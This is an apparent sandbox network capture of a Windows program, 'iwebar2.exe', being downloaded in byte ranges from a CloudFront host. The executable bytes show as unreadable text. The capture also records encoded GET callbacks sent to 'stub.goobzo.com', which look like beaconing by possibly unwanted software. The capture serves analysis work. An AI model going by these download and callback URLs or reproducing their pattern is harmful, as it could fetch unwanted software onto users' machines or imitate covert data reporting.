    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2750000-2999999/5974736
    Age: 21890
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: JC-bGhFH-9NEVdyTr3O6Cbv9eIdmhtj4V4XMQgGk98dODf0a3KCKTw==
    ....jH.0...]if..gR$H.f.!u.P...0o,...Z.U/....e0).^.9...l/..[.J..D.\.y..
    .\.U....j......62.I~.I...x...K.*h..e...6...S.J....oD3hE....=......(x.d
    "=...l........3....`.]..$......R.............r.8=s%...hY.%..M.Y.O.gU.*
    GP..7......94s......... ..y2.=.i..Du&f..6?.............y....../.5.....
    ....4.$...&..>:<...E.Z.#..=.M..<..j.dGa..O..........j..<..
    :.Is..YDq.......S.X...wx1.pi..8...\..$.........Y.....F....X..$.....HN.
    ..E...<.U4....h.....7.I.?..|.l.[../d {L......|x.....Td...M.f.N.....
    ^.......?'..|....X....d".W...D..fPC..93...s... r.....S.hqTL..&sQ .%K..
    J.......*K.H.M.......OL.7..I.......Q.}y....m..QPgG....g5AL]Y..C_...%x.
    ....ub...(.....'.....1..U5..U.c.w$.........sV..^..Ac..A=..b..*..n./p..
    ~..z}.).M......F?<.....E.Yg>-,.. !.........B...;-'.j...!....3B`1
    .!k7.)-r.....CO.O...Rr..(ZA.P...8o....'@...PD....J...H...9.v.......S..
    [email protected]\fe..b....z.p............=.....E7RKfPm..I
    .'...0%.y.*4q~E...L_.J..9D..TY.....T..*^.Yh...>.....V..|(..}N]a..O.
    ;3.bw0uN.u7....p._.L.*> pw...(..k7L....8......T.V']..($..w<.)&..
    .%.k....:m9.....Od.pt. .6:Q.n........>.<D...O.x...P3....Z.7....
    ..o4..p9......'...817.-.'w.y...............b{..I...a-.h.t8........%@..
    ....EJ..B....\k...?..x...d........|;MP.x..W..N..kWf...t...B..l........
    ...#.d9.7...z.....=...v.E...~.??.M...<.`B...]..p..j-..})A.Y..j]..mk
    &\...y./.U..x.|}..JD.t....#.....^[email protected].&.//#{:...n...O
    >.v.Q.q.}.9,...'.5.6.f.8....F..u.....Cq.c.....:OT ...c.{.|5...{yg;.
    .........&.5..Ha.....;...#[..7[....K#I...D..8..i.c..Z...v....u....

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=3000000-3249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21893
    Content-Range: bytes 3000000-3249999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: zJEhJAN6kPS9DwrtTmxr6PaoeFs_iQ3sjz1f_7ni_TY3os-Hnqk7Zg==
    x...4...`..f...T.H...}U.C.r........rC...w....;T..p..I.a4{.w_..%......r
    ..Pi.]..y=g..w...?x.S.^...i1..4E.$'......d,...q..T[]....-..>.......
    [..t..G....v.6.h.........F.-F.....R....K.~l.../..}...z.D.LD...}}..9>
    ;.........QJ........OF......*. .u.zA>0.E..X?.._.!...".IJ.s.&^3..7Tw
    ..:[..d q...,...#.y..e..v.\.../.f......D.N!8...:..^.k......Ov.Y.......
    /.,.!^..[].2...D.z..7....Z.7.~.%.....F...Iqu.4...f.hT.g][.:...}#'...*.
    .b.......,l.t...7..e_..o....;>t5.........l...W......._..cFd.d..RD{.
    2..?...es..b..}...4...........Tz[....S.r."...U>S..v@>.`.r.n...C.
    .>..P.e....Se.}k.....B..3^...^X>.!.p]b..-.gG..%...<]..P#.Q.X*
    ...w...$l.30..^3...puW..i...dj..r{.........zEA........y.MS{m...(.k.8.r
    H..F..L..NKk5Ym.4]f;..q...d....'......LMA....C.Y/B...Y(Ac....{....Xw."
    &@ T...CL|.z."....n...M..`..2.aKr.wEx;/0..e.5Rl.q.xv..6f.p,.... .F....
    [....>.....j.wd<)n.$w.^.fp...............2..S;..Pw...W.....S....
    ..C.. L[...i...=6P7d......bu.....w..Y.....t%....o[..c../.....:..G..9.:
    3.....D .V..j..}Yb..Ju..U..~...-. [email protected]:....`.hV-
    ...I.U..`.>.....hN.&...........v..0nG.z.m.,2......t.P25..6....G...$
    b..D.Q...4.t...-......I....&...b.n.z...n1._.y..d...u........D.*.....p.
    ...:I....R....zKV.....g{....~....M...}1Vit...J.H&m..s../....j...b..cT.
    FE.....Y;..I.....*.Ei..l~...../.]:..T..j.{.5...YV.h.&...4M$[f.R..Y..\[
    I......o..j......DDBL^...MK?!........z-.c?..`L..p....w.S.v...\a f...#.
    ...!2w\.[..y.[.t..#.....H..#I\.'.ER.v5c.?.\c.(..L...}@...N.$....H7v..i
    ..!..8..~...J?.s..^.a........Y,j..,...<j..A....W"m."[email protected].

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=3500000-3749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21895
    Content-Range: bytes 3500000-3749999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: hPOL3yUe4ZlP2Nm4AmMg0CrYacxwKPtfBb2A4iXiF8d8Lbsc-s7rdQ==
    .b.......f)R...Efx....:....L...R(...:.;@.Y...W?1..w.....,..A.dL(.'....
    .5a.f.<..2`...~.{.R...c.zpH.;....T......... ....T.c..;y...G...}._.f
    A.......[&..... n..$...|.X...9.....*Ip.#k.v*.>.oA...g.......<#..
    zZ..c..la.h.F...}].).............#.~5....[..?.wZ..G.|%r.......$Z.....o
    ..=...3ZU....4.n..L.V..........'`|l.;f....W.......A.5..&.....R..b.$z..
    .r........ .H......;.V...Jq.."p.4^lg8qzY..Z...y.26........9......G...~
    8.O._"...KiO"..u..?(.....o..........Z.69.@6 .o..Cm. ....z.vU..#f...).:
    "....F0t.].......Jw.\Q}...(.....<....uM.~. E....t.....3......5.J{.G
    B_...../.."D{3.|..p...0!.....2..=..3Z..v...#S..D.....r.J....h..y...u_.
    ..r.D.r3.1&8...(...z.Ii(.#..;Tc.JF|...Ft9...0M.%.JC3..B...............
    ....5..`[email protected]>..y.T....]x.\...^.8t........u...N.X.B=...2
    . z..|..uO....k.<.......G.....S.jf...9.=...!..u,..#/c........-C.(..
    >/...-b..(?.X..CJ(.c)M.a.."V......#.S......_....K..)....A.O-.....2.
    .....?..:./....^.D}...w......2....M.u.r:...u.....{.O..E...O.l._.....s.
    ..#aW....n.[..=.....d..B..... %w....~.w./..l/.h}.......7.Iy[jpt.-)"c8.
    d.,......6..8..w.B.Z .S:.`o.S.._]!....K ...n d.q/..}...&....>n..o.&
    gt;..u........N......Rd...V2.\=2P.<Z ."..F..#.~.........0.hACa.....
    ...o........G...U,k.~%?..:. ...l.$..j9M..3k...jA...3"....W.i..~.w..Y.l
    .0.h...T..{.B.V...W9.>.6...f../...X....*.....N}....G.t...M.}....76.
    ...5..s......p.U?W...G.9a.I.o</IG0_=..%..x.}..... s.[.=.:.-...D.}[Q
    z....i..T.Y..gd......]..i..#S..% .......0...FMY.T.{..)KKT....*....Og&A
    .....'a~..G....5.Wt...D&k............E.2..rQ.|....pZG].....|g.?.#.

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=4000000-4249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21898
    Content-Range: bytes 4000000-4249999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: AHb4C6IGxZefgATscnaJcuzSq5MwYSzT4itvq8kmrYPXjTfB52zFNg==
    .......:...2l.k....g1...1&Bc....."...q..Z-......-.LVgI......]$..}.c.:.
    ...\,).A...F!z..Z.F.......FKj.C.F5.V;&....Z.EQU.#..D.%.h..H.#.h....,W.
    .....#:(Yu.f..iM..t..P3G..........x.4......DE7[y...F..Z.;P.....W\...i.
    ..oo..4........c}>..q[...rQ.QU3......L..6.%..S..:.l....W...E.9#....
    .EY......A....q..A. .*..\...Sg..p..u.....2}?.'5..w.....L.C.c.o........
    .P.....v..5.f.<2.o...}....[..........o.8.... .a.."...0...mU..m.$.lr
    ........O.......KvBr.x.Q.`..7.g. .l.h)6....L 6....A...2."../Ie..LcB..5
    .v*/.....=.........W.<R...q%.H..,_....2.T!.<V.^..q..Pbz.9.(J1...
    ..A....n.5......t!0.O.U...].....D.o...........W".V\fTV.'.y.R..........
    [email protected].>2..8.i..y.4..nsp.`@...^.0.H.h.n......[.....UG\.....5
    >.a...7......]..m..t..my..[.}...#.......X.GT..:...!._..)B.....p....
    .*....,..Z..p...P....)....vW.......o.q...a...u....aJ..v....|...}&g.,.3
    .Z..!....h0..G.L....I...F W.....Cw.G.e.7k...<..>x...._5.;./.._.S
    >.=...gh..2.t..z.8....F........... p.:...x:..|...n...1.A}.0.|@.q[.K
    .. z...&~...#.&....^...0...cj3.P.&..e~.D..8....r..l.......3\R..JRX....
    .>}.bah..I.c\s..K.......,;.\!..M...2.E......^v.x'......N...c"w.u...
    [j....T.T.g.A..k.Y............,...N..Ho.3y..........qc.""..}\L 0.....x
    QZ...]7.x..O*Ot....6O.g..i_.#.r5...jP.....9y....R....J.j.VA...D.&...y.
    .Mj.Y.. ...0Wj.n#..Cy .......$3.8...]...Q0_>....^....W.o.7.....B..$
    ........0..`..$R..Z.......Dt....f...zd.\.:ij.*.......\.*......:.9..P_.
    .Pa.b*.J.....a.J..D..0.k..X...h.e59.S`]]G.5b.H.<.F..1.2X.?....t.o.&
    gt;k=.J.......YO^..t..2.../z...,W.........Z{. [9...$.|....C...h ..

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=4500000-4749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4500000-4749999/5974736
    Age: 21900
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 4TIFqiL5eaLBsSxKWcSO7P62qsoL6ZtyIR2_RD05tl6G8yBG9l_9AQ==
    .:........dJ[].b=......../B..<..Q1y.W`..G .K..vd..U...*H...xvC .L..
    .u.....w.k-.-F.4kR...."Af).K..Q8C.~{...0.0B...3...w...l#r............-
    .%OS..]D..BRD@{....1..&d.bz....I.gE...>...s[...".Yf.bt.k.'.).O.>
    ......C.._......I.........2....O.p././.....u.&..*]...-.........!......
    1..d>g.K.N.b.. .............x>....%.....{[email protected]..\....?.CQ.
    .0.....W.........R.IGr0...)..A....8.wGs.5.Y.B.)... J.%......}.s.R...X.
    .kx.._..a...3....g.~.....H.DP.*...#.d....Z....W....c.5..V...[...&.Uc.:
    ...&f., ..d......?..:.~y..dF...D"L..ql...:..).......|N|.<..3.E...b.
    dL#.k......<...k.......>%G..n-ri.Ui..((..-...^..T......?...^$5&g
    t;..v...{p@...%.J..&...cb....A ^E.b....b..5'. ......[..T.K.Sya..}nJ...
    {4.a.*.4S.$1..........F.....p.Y.......i..w......Y.....y..`.....h....,.
    ..}....&U.D....F.H<[email protected]..!....U.....J..
    .v.....g7....../[email protected].?p.=:...qu..)....G!.,=j!...0...X...]......
    ........G...3..U]..]:[email protected];...2....5...,..O.R...t...G..u
    ....B.5.5o...."Vv....6..p.5.,y.....x.KL..J.0O.D....C.6...6..GC........
    ".j...D.... .u-.......k}..........8$......zx..u......,....~..k^..,.0.&
    lt; Tq.Uu..7z99....#(........B....H..".S6.1...l..>.d....H...U.H..H1
    yL|.o.F...2......d|W[.>.....#..R........E..s><.h..g..,{.!\...
    q...x.G:....x.-!.Q...)dM....wT(..C Ym.%...B ...8..SO.."...G.q.E&.K....
    \..u..>2.fC....IT.J.V }......zf..'b....].3.uHFb1..g.RBuN%.V...2...j
    t.n.......y......|U.m......g.|>A..j......SC..5.8..*3.U..j.....sx.:.
    H.8.xj.e.Qg.kC..#.uO............T=....q.Z..>.k...$0.dw.Vy`..`..

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=5000000-5249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21902
    Content-Range: bytes 5000000-5249999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: -TEZkiWcJkYU3EIgEBUcTW5Q3yhkdvIt8fqcGAFtd3VcEK-ERJiQ4Q==
    .i'.`...0..".^..7.@.#.C..>~...8..-.. .~vM*.....4..v.G...... b..6ZD.
    ...i.JE.....nv.W5.'....k.X........;..m..'#.#...}Er..s.y{...^.(......[.
    ...:o#x%}glT..yV.....`.....{......^t?..........(Y.h%F .l.>....^..1J
    .vY...l9%.z.\....w.....b......t..# .W./.w."e:..........q.AD........G.
    .... j...{.0...e,nt.....29..Kh1C...F.h...`.^...`b.'.<..B...n.E"....
    [..*,.IC.........w......cW...A...%_....j....E.2......!Q......BH...D.Gd
    ^".....yeV.OX.L,C..UT..K."d....R..Ui.LK.f.X.9..................{...p..
    r....\`..$....)?....'B)sd....J......Z/.N...@..:.r.$.yh..UY.h..W......~
    .^.....ed\......./...f....3...)K.~......x.$&...4..L.PBl....<.......
    w{[email protected].[7.`2.*Z..>.|.k..1. .R....5d#....`X>.bZ1.
    ..s.U.j..*...6.......#.0.....`)c......q...:$..wL.dhz%....x6\m........^
    ..;.....m.b..V.LZGm.3...\.pY...D....j......i......5......o..4....F|.i(
    ..]Q {..Y...... I0.p.....\...LL*N....}..8......a.$..JE...s..Ed0...a..B
    .F.?.....s..P.8].....).....<!{8..M....-U.....t<......]..J..<.
    ........1.KeU..|.k.*4.......s.....J...m...n.Q..e ..&/Lg......_.....HT.
    n.h.......w}.....pEFk.. .]\4M...-..p.Fiv.....MN.../d.a9..K..H.....%J..
    [email protected]%...F\.S\..U...M...X=a%.. .r?....s4..NmT.2*.YE.V
    8b..]G...f9..........!.4....73.$./....n-.ZO....2..t...y*[email protected]`..
    z...o... XO....d....~.;...../!H..~(.&.......3.(` ....>A.g.VB.......
    B.).Q............f.8,rn.l....S.,w.Y.O.[.......7....|...S..k;.pjo. ...
    R.y,....=X....._{C.PkP...](..h.....M..3....v.I.w..l..w..m%)/...ANF.J7.
    ../u.Ll...]..>.p.....3.... ^.&;..JL.,.D.kw..b.&#.n.[.i,.72.Z..

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=5500000-5749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5500000-5749999/5974736
    Age: 21904
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: yRGqdLSSE-X7o097cOmDHFURCVNVXvd5z1K2RUx1eJCYohd30v_2GQ==
    ._.......s2.....yzD...U....... ...t....^....Q....Y.Gr..\..M.f.~z.1CS..
    A...X....y0.......HV....y1..?X.7U...nm{..>...Q.y.l%...,P..... . .].
    zS..... ..k.\!y!b..11.#.....s..X \t}q<...Y...>...........%..wbQ.
    ...;..........V...T.8.7.......$....F...n(...Q.-.'..;.pDYAO`.I....v.7O.
    ...].;4..w6_y.S..pZAt...#...5............\...z....M'(......"T.-..R1.g.
    ...^..4y.}...NB)...r......3....Ei.9. ......K...t.,.6|.\.`..a{./.b....f
    Q..u.s..g..{..'A...H.w.-*...E...;M.AS..g.6......ZY..~G.C...,Y.<....
    b>..Ekb...L,......w3k5.....\....H..<....:.......q..'"D...|......
    M..h.h...*.?pW..0]..O.p.Y...$.K...U...c]}./...#....r.z./.p.!#I..0.ZIx.
    G.I...5.Tp..;7L.....E.........m}n..4w....V.@.".j.O2v.x..`...S.._Ta...:
    .....).."..P..iH.".W..r.2....N..38..`g...(.wJG........h..J.....A}[7...
    .n.w`.b. 'B3W..L..m...[u....C.m%.L.f ..7.j.......K....5..I.F...O.v....
    b.&..?.76'oi........z]...&y....j..5v..t......Yh..u>.!#y,......Q....
    G2..H.K.......F qH"d.q!.G..........O..l.i_N.../........m0F..k..1....@O
    KR.l[.. .....Ge.......f#V-..(..X.......zZ...N......P-y...6N...EQ..\z..
    ...)...Z...0... X..dy....A.....D...*aP...b....j.b..%.=.........x.8fkW/
    . ..L..BR...z...e.zYe...S...".* ...7..x.~.]$.P.ei.K%.......<..!....
    K5...x..u....ncok.,.=;F^..>|r.,XC..r..y#m..?si ...=.. ...EW....p=a.
    ,..t...d...6*j=5...*[email protected]...#.BY..k...f]..7..%1.[.)..'Q.`6nu.
    ...i. /.BsV\..a..h.p.C...?D.......a6$JP......7........\...o..........\
    [email protected]....(..`....I.......(. |......T.....P.e_ ..F.H*hP..R.~.
    ..|_d......%.....4s......6a...?.....<P.{...-......Z:v..K_...LB%

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=5750000-5974735
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 224736
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5750000-5974735/5974736
    Age: 21906
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: mVKC5aoEvkCbhoXLlOtRfr1pvD1OLYyUgpnPyNbsKmHie5nvPm0nRg==
    .....}..re...?c...Q..P...>..Nk...E.?..R.s.GvCBf....h.RX..&j..?.....
    :<.P........1.......D&gP.yYG...j....BL..._9.!NE.M.KY{.a.MWos.Cv...o
    [.".]u......]..).]p. i. e....\...5...$..=..PD.]~.z...,q..8.X..v.!L~.J
    7.e3;..t.79nE....u.C.. .O..d~.c.t4.o..{..J.....j4....-....H^n.dW.g..kG
    q..D....{..Xu.p...N... .m...C'Z..K.u.J..]8......o..]......d\wO/.... .t
    w...3{.U.........p6..,..l..f.7...>P..Cy.......n.y1p..Rp...CJ6.r$...
    ..M..(.k,P...2...pC.D)..V.A4..X......"?(.b d.q^..w..>.G.|U....*t.._
    ...^.i)........g...(..3.9 ......)...p.Z.L.XyQH*@...~...........P \u.5K
    M.D..7...I...&.3....O,.lk.:.eHY{...b..")U...tixp.d4...}.5.....Z.X...5.
    K.(I..`FE!X..n]r....#H..U....a...I~#}.Tr@|.ZD...4..m .......T,........
    ..)..R.....z ;..-e~8...&M...[... ?..Nc..D|.....8.EH.".1..#.J.OHM#...B.
    ;E..B. ...C. e#.5k.m...p.Uq3.e...).L.,.0u.v....)./.6{...>.(u =b&.sQ
    pL.n-.......^..!p.>.D.....m...Y...$GG.;T.?..(.v";;........#...7..?.
    [email protected]..!F6o.Z..p#.Q]..x=.~)"....^..F..6.$....Rh.`.yK........ ...,f...
    .......Jg..?.3..r2u..A.G...r.U.;.'.6.P."5.2.x;2f~<..[2A..z..>.!.
    )>..G..G..o.>2:..=.d...vd.m......fH...........v..w.....<..cp.
    .Y8.0q....Q.a7n~&0,y.(...>/....Q....@;o...T4..._Q.T...P.K..K...C?..
    .D..2..Zu.qn....G8h.;,...c&6...".b6..d..G...9....R...^..]\.4k.)....g..
    ..=....v..<D&l.@![.....J..ee8Y.\[email protected]....
    .).NHB.k~....|...........t.{.(7.....c...0............g.&... $...O.ru.Z
    .a..f.,....?.J6../-.*...'.C..r.........\...t..P.../._...nGF.U(...A.Y..
    .d.W=......<s.....Y.._......\....).|x|1.-pA.MCc........'..._...

    <<< skipped >>>

    GET /p.ashx?e=blUJ6JGwk9JN39k7Xfv8ZV9Aufo681yTjA5kVqVgWdAgLxC0aXqYrfeVKhATcvrDNnjgeuHGNQp4nJxtavSnm1i2s6XsF8NYDbIMzp3umKKLXU1phjFw2QjYjXjSiKQCX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8WY515bwKb4/A== HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:25 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESrStpyyCRN5wE8SFHLIEPsIrbCKwGMe5Y4VTmYx8DZjA8oxErH8fL5pgPXGLp3QYEb98NyY 3Jv/oKdNf4wHzMG0hjZa1YiVe HfvMJQtwAnvnQunoWavo1O8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7Tk HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:25 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESgu0rCkTVQ8byyO6Ebs4xmkKABP6K/iqqErQGcrZAOeGNEtZ1sX9mVGQej1hJL//7q rbptvtlqMuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:25 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESWOmrCoYyvl0E8SFHLIEPsCulakfvQngeO50oLgZRN2KyncvP/Aj8LY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4= HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:25 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=aQQpsP6/AW3U0UsIWSR1jaShngkjl6Wn7OXLse4BafSePFQUn2Ibrb6Gb8KFABTw0I GKFrrI062Zgsasucq3OoYmyje41WxTJe1GQ MRj50TBvNdroHSbLRD/MFmTIYRWGjyvG Kbs0adlvQBqn5d37ZJy NkuaYCpHZc9ZUaGGezoD1qtkebhzXK2mWcezxLLCQXXwGXyfgz4Wx8XBMyQ 5eGHwhJ7xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FK6VCsNuKBiir8uE40O0xGz4zJfSwDmmmLcb2RMdMffP3LkO87mF5Z0g== HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:26 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/plain..Ser
    ver: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP
    .NET..Date: Wed, 04 Jun 2014 18:54:26 GMT..Content-Length: 0..
    .
    ...



    GET /p.ashx?e=VlXRKcYhvMZN39k7Xfv8ZQQrK49K1Uf9jA5kVqVgWdDiWMa2QsVMWSEdbCsTxXU3wevOyHMrUv7dPpuGYiwKKAUjnBK5teTHDSzCAjSAeoQ/JbFmSKXuki6W6A2stOLbVQy9/aflzjqoAmQHyIej2lLthe3E5HJFAhTD7v1xeC4pGvADS7bOhn9QQGOCx A1cdUGYiS9T3gaW6ev41W4C0COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZUJF8t7lKmIud4879GQUXL/flUKwD azUc94dAxwtdUOzX1Gx nY/ao= HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:26 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e= 0m13SthQps 8U9Mk34kw8QS2RgqxlKpQF3UKsSdb2vwmjpruFCyhX5dMiu8MPG01B6YeMqi Im/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCylGWU7gz wA0swGIbO2JyH/2oW7UKZaCDjhCmRuZ7WprNUozDc7RPfSdUOgYS KH2EUAvnawhe3hey0PnzBt51Djaca1IHJKONfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUsU/wxlH/T7FVXwqVIKbqJg38AnGKh2b/Oj3O6v5lgVxEr5pf74WHLE HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:26 GMT
    Content-Length: 0
    ....



